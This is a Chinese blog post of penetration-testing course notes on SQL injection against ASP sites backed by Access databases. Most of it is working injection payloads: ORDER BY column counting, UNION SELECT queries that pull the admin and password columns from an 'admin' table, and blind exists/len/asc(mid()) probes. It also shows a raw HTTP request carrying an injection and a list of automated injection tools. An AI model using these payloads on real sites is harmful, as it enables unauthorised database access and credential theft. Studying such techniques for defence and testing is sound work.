小迪教程第三天——access注入片段

最新推荐文章于 2024-01-29 20:33:39 发布
最新推荐文章于 2024-01-29 20:33:39 发布
阅读量524 收藏 2
点赞数
分类专栏: 渗透测试 文章标签: access sql注入 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_32458499/article/details/78237550
版权

1、Sql注入产生条件

1、必须有参数传递
2、参数值带入数据库查询并执行

2、access注入攻击片段-联合查询法

1、判断注入
2、猜解表名
3、猜解列名
4、猜解数据

猜解表名的过程如下:
1)Order by 22 22 代表查询的列名的数目有22个
http://www.test.com/Production/PRODUCT_DETAIL.asp?id=1513 order by 2cc2 正常
http://www.test.com/Production/PRODUCT_DETAIL.asp?id=1513 order by 23 错误

2)猜解表名 确定存在admin表名
http://www.test.com/Production/PRODUCT_DETAIL.asp?id=1513 UNION SELECT
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from admin
这里写图片描述
猜解列名 猜解数据
http://www.test.com/Production/PRODUCT_DETAIL.asp?id=1513 UNION SELECT
1,2,admin,4,5,6,7,8,9,10,11,12,13,14,password,16,17,18,19,20,21,22 from admin

表名和列名猜解成功率不是百分百,猜解不到解决办法?
1.字典文件收集(社工)
这里写图片描述
多去观察网站的命名规律
2.Access偏移注入

工具猜解字典文件设置:
这里写图片描述

3.access注入攻击片段-逐字猜解法

查表:and exists (select * from 表名) 猜测表名
查列:and exists (select 列名 from 表名)
查数据:1.确定长度 2.确定asc数据(asc编码)
and (select top 1 len(列名) from admin)=5
这里写图片描述
and (select top 1 asc(mid(列名,位数,1)) from admin)=97
and (select top 1 asc(mid(列名,位数,1)) from admin)=97

Admin
Admin,password
Admin列名长度为5
Password 列名长度为16
这里写图片描述
**拓展:
抓包分析注入工具核心注入语句
利用自己的编程技能实现山寨工具**

数据包:
GET /Production/PRODUCT_DETAIL.asp?id=1513**%20%20and%20exists%20(select%20*%20from%20sysobjects)** HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Host: www.test.com
Cookie: ASPSESSIONIDSATARCBS=JKKPGAIDNNFGACMCDEJGCMEC;
ASPSESSIONIDSCSCSABT=HALFGFIDEIPDGCDIIFJNAKPF

啊D判断注入点:
这里写图片描述
注入工具:
啊D,明小子,穿山甲,萝卜头,sqlmap、、、、
工具功能性:
支持数据库类型,支持注入类型,注入突破类型,工具速度、、、、

仲夏199603
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
小迪教程第八天——注入工具sqlmap的使用
仲夏
10-17 665
1、安装过程1)安装python2.72)在python2.7的目录中解压sqlmap 3)在桌面建立快捷方式 2、使用方法1)get类型注入Sqlmap.py -u 注入地址 检测指定站点注入情况,默认会以get类型注入检测 2)post类型注入3)cookie类型注入Sqlmap.py -u 注入地址 –cookie “参数” –level 2 以cookie注入提交检测网站
Access注入 — 偏移注入
Mr.Huang_的博客
09-04 254
一、偏移注入使用场景 二、偏移注入步骤 三、偏移注入靶场讲解 前面的内容是上一篇的access——cookie的内容,这里我就不多赘述。 下面演示使用得是: F12点击Console使用js方法,当然还有其他方法例如插件,抓包等 直接开始 这里我就不多赘述,判断回显位。 document.cookie="id="+escape("171 and 1=2 union select 1,2,3,4,5,6,7,8,9,10 from admin") escape()函数,里面的数据会自动进行url
小迪教程第九天——ASP+ACCESS注入/HTTP头注入
仲夏
10-20 1596
1、Asp+access注入1.表名获取不到1)看网站url地址 www.xxx.com/new.asp?id=45 www.xxx.com/e_news.asp?id=4 www.xxx.com/e_product.asp?id=4 尝试表名为e_的一种结构猜解2)看后台登录文件源码3)组合字典暴力猜解2.列名获取不到Access偏移注入2、http头注入HTTP_X_FORWARDED_
Access偏移注入利用-01
09-15
Access偏移注入利用-01
Access注入
zhuangsle的博客
08-25 627
Access数据库注入 一、注入原理 (一)判断数据库类型 1、前提条件 SQL server中存在内置的变量/系统表(数据库服务器基本上都会有); IIS错误提示没有屏蔽掉,并且SQL server可以返回错误提示; 浏览器能够显示相关的错误提示,一般低版本的ie浏览器可以显示相关的错误信息。 2、通过内置变量判断数据库类型 概述 Access数据中存在一些内置变量,例如User,并且其数据类型被规定为nvarchar,我们可以通过构造SQL语句,提交查询让user与整型数据进行比较,不同数据类型
小迪安全24WEB 攻防-通用漏洞&SQL 注入&MYSQL 跨库&ACCESS 偏移
最新发布
weixin_73760178的博客
01-29 995
SQL注入:传参id变量,通过$sql变量来进行指定的sql数据库查询,从而执行恶意的SQL语句,实现查询其他数据内容(敏感信息)**原理:**借用数据库的自连接查询(inner join)让数据库内部发生乱序,从而偏移出所需要的字段在我们的页面上显示。实现当前网站跨库查询其他网站——原理:因为是root用户会管理到所有的网站的数据库数据库中的操作能被其利用和破坏——增删改查——需符合SQL语句的逻辑格式。注:这里的联合查询是有限制的,就是union前后查询的数据必须保持同列。产生在数据库上的注入
小迪安全》第16天 SQL注入:查询方式,报错盲注
m0_56250796的博客
04-28 236
进行SQL注入时,有很多注入无回显的情况,不回显可能是SQL语句查询方式的问题导致,这个时候需要用到相关的报错或盲注进行后续操作。提前了解SQL语句写法也能更好的在手工注入时选择对应的注入语句。
【网络安全-sql注入(5)】sqlmap以及几款自动化sql注入工具的详细使用过程(提供工具)
m0_67844671的博客
10-03 1841
本篇文章详细介绍了sqlmap工具和使用,如何用sqlmap进行自动化的SQL注入,还讲解了穿山甲,萝卜头等自动化SQL注入工具
【渗透实战】日常挖洞第二期_旁站注入“花式”漏洞拿下大型服务器
q848581720的博客
10-26 2045
/禁止转载 原作者QQ:848581720/ ■重要细节全部打码 ■部分细节对外开放 ●漏洞已提交,无影响厂商忽略 注:日常挖洞系列基本上是记录平常遇到的非常普通的漏洞,毫无看点,仅仅记录挖洞的经验 ———————————————— 这某个晴朗的下午,我无意间在网上看到一个网站“某个社会组织信息网”附个图 按照习惯,我们点击一篇文章进去,看域名http://www.xxxxx.com/xh.ph...
靶机-佛山发发鱼喊access注入
05-09
靶机-佛山发发鱼喊access注入!很多视频教程中使用的靶机!默认含参数过滤,为了方便新人测试我已经去掉了参数过滤!
佛山发发鱼制服有限公司网站源码
11-25
存在asp注入的网站源码,佛山发发鱼有限公司网站源码,cracer注入视频所用,小迪视频所使用的注入源码。
公司网站源码ASPCMS
06-02
公司网站源码ASPCMS简单搭建起一个公司企业型网站。
广东佛山企业网站
03-25
<p>后台功能列表: 首页/公告管理,相关产品管理,购物车管理,财务管理,代理管理,用户管理,系统设置等。 适合用于主机类的企业公司,商务型企业网站等。 管理登录地址:/admin/admin_login.asp 用户名:admin 密码:</p> <p>wwwmx111com</p>
havij 萝卜注入工具
06-12
havij 萝卜注入工具
Access数据库应用实例——教务管理系统设计教程(含成品数据库
08-04
#资源达人分享计划# 本教程将手把手一步一步教你从0开始制作出一个可以正式投入使用的教务管理Access数据库系统。通过本教程,即使你是完全没有基础的小白,也能掌握表、查询、窗体、报表、宏以及各种控件的使用和...
ACCESS数据库应用实例——图书管理系统设计教程(含成品数据库
08-04
#资源达人分享计划# 本教程将手把手一步一步教你从0开始制作出一个可以正式投入使用的图书管理Access数据库系统。通过本教程,即使你是完全没有基础的小白,也能掌握表、查询、窗体、报表、宏以及各种控件的使用和...
Access应用高级案例——访客登记系统制作教程(含成品数据库
08-04
#资源达人分享计划# 本教程将手把手一步一步教你从0开始制作出一个可以正式投入使用的访客登记管理Access数据库系统。通过本教程,你将掌握表、查询、窗体、报表、宏以及各种控件的使用和设计,了解运用VBA进行控件...
ACCESS 零基础到精通教程(新版)
05-14
第3章(3)表操作三.AVI 第3章(4)表操作四.AVI 第3章(5)表操作五.AVI 第3章(6)表操作六.AVI 第4章(1)查询操作—.AVI 第4章(2)查询操作二.AVI 第4章(3)查询操作三.AVI 第4章(4)查询操作四.AVI 第4章(5)SQL语句和实例...
Access数据库应用基础教程(第三版).rar
06-20
Access数据库应用基础教程(第三版).rar
微信公众号 token php,微信公众号开发——access_token的获取
05-30
获取微信公众号的access_token是进行微信公众号开发的必要步骤之一。下面是获取微信公众号access_token的php代码示例: ```php //替换APPID和APPSECRET为自己的值 $appid = "your appid"; $appsecret = "your app...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值